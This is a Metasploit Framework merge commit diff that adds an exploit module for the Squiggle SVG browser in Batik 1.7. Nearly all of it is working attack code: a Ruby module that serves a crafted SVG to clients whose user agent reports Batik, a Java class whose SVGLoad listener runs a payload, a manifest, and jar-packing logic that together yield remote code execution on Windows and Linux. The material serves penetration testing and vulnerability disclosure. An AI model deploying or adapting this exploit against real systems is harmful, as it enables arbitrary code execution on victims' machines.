Merge branch 'batik_module' of https://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-batik_module

2012-05-17 10:55:58 -05:00 · 2012-05-17 10:55:58 -05:00 · 1b70ba8208
parent 99368d27e5 0fd3f96720
commit 1b70ba8208
5 changed files with 158 additions and 0 deletions
--- a/data/exploits/batik_svg/Exploit$1.class
+++ b/data/exploits/batik_svg/Exploit$1.class
--- a/data/exploits/batik_svg/Exploit.class
+++ b/data/exploits/batik_svg/Exploit.class
--- a/data/exploits/batik_svg/META-INF/MANIFEST.MF
+++ b/data/exploits/batik_svg/META-INF/MANIFEST.MF
@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+SVG-Handler-Class: Exploit
+
--- a/external/source/exploits/batik_svg/Exploit.java
+++ b/external/source/exploits/batik_svg/Exploit.java
@ -0,0 +1,27 @@
+import org.w3c.dom.events.Event;
+import org.w3c.dom.events.EventListener;
+
+import org.w3c.dom.svg.EventListenerInitializer;
+import org.w3c.dom.svg.SVGDocument;
+import org.w3c.dom.svg.SVGSVGElement;
+import metasploit.Payload;
+
+public class Exploit implements EventListenerInitializer {
+
+    public Exploit() {
+    }
+
+    public void initializeEventListeners(SVGDocument document) {
+        SVGSVGElement root = document.getRootElement();
+        EventListener listener = new EventListener() {
+            public void handleEvent(Event event) {
+		try {
+			Payload.main(null);			
+		} catch (Exception e) {}
+            }
+        };
+        root.addEventListener("SVGLoad", listener, false);
+    }
+
+}
+
--- a/modules/exploits/multi/misc/batik_svg_java.rb
+++ b/modules/exploits/multi/misc/batik_svg_java.rb
@ -0,0 +1,128 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Squiggle SVG Browser Java Code Execution",
+			'Description'    => %q{
+					This module abuses the SVG support to execute Java Code in the
+				Squiggle Browser included in the Batik framework 1.7 through a
+				crafted svg file referencing a jar file.
+
+				In order to gain arbitrary code execution, the browser must meet
+				the following conditions: (1) It must support at least SVG version
+				1.1 or newer, (2) It must support Java code and (3) The "Enforce
+				secure scripting" check must be disabled.
+
+				The module has been tested against Windows and Linux platforms.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
+					'sinn3r',           # Metasploit
+					'juan vazquez'      # Metasploit
+				],
+			'References'     =>
+				[
+					['URL', 'http://www.agarri.fr/blog/']
+				],
+			'Payload'       =>
+				{
+					'Space' => 20480,
+					'BadChars' => '',
+					'DisableNops' => true
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "none",  #none/process/seh
+				},
+			'Platform'       => ['win', 'linux', 'java'],
+			'Targets'        =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 11 2012",
+			'DefaultTarget'  => 0))
+
+	end
+
+	def on_request_uri(cli, request)
+
+		agent = request.headers['User-Agent']
+		jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+		jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
+		rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+
+		if request.uri =~ /\.jar$/
+			paths = [
+				[ "Exploit.class" ],
+				[ "Exploit$1.class"],
+				[ "META-INF", "MANIFEST.MF"]
+			]
+
+			p = regenerate_payload(cli)
+
+			jar  = p.encoded_jar
+			paths.each do |path|
+				1.upto(path.length - 1) do |idx|
+					full = path[0,idx].join("/") + "/"
+					if !(jar.entries.map{|e|e.name}.include?(full))
+						jar.add_file(full, '')
+					end
+				end
+
+				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
+				data = fd.read(fd.stat.size)
+				jar.add_file(path.join("/"), data)
+				fd.close
+			end
+
+			print_status("Sending jar payload")
+			send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})
+
+		elsif agent =~ /Batik/
+			svg = %Q|
+			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
+			<script type="application/java-archive" xlink:href="#{jar_uri}"/>
+			<text>#{rand_text}</text>
+			</svg>
+			|
+
+			svg = svg.gsub(/\t\t\t/, '')
+			print_status("Sending svg")
+			send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})
+
+		else
+			print_error("I don't know what the client is requesting: #{request.uri}")
+		end
+	end
+end